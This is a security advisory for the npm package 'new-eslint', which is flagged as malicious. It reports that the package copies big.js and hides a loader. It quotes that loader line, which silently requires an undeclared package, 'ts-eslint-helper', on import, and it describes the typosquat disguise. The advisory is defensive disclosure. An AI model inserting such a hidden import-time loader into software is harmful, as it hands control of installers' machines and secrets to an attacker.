npm · Malicious package advisory
Malwarenew-eslint
MAL-2026-6224
Malicious code in new-eslint (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (6f068a5c7ad1a53c60d794a3b4585418956c176c42b8d5d90855e2ac60962b25)
Package is published as 'new-eslint' but ships a verbatim copy of MikeMcl/big.js, with a hidden loader injected mid-file between P.minus and P.mod in both big.js:605 and big.mjs:605: `const helper = require("ts-eslint-helper"); helper.from_str().then(e => e).catch(e => { });`. This require fires whenever a consumer imports or requires the package and silently swallows all errors. The required package `ts-eslint-helper` is not declared in package.json — the manifest lists a different package, `eslint-helper@4.0.1` — so the loaded code is undeclared and attacker-mutable. The README claims 'no dependencies' and describes big.js, while the package name impersonates eslint tooling: classic typosquat lure plus hidden remote-controlled loader. Whatever `ts-eslint-helper.from_str()` does runs in the installer's process on import with no advertised functionality justifying it.
Compromised versions (1)
- 7.0.5
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.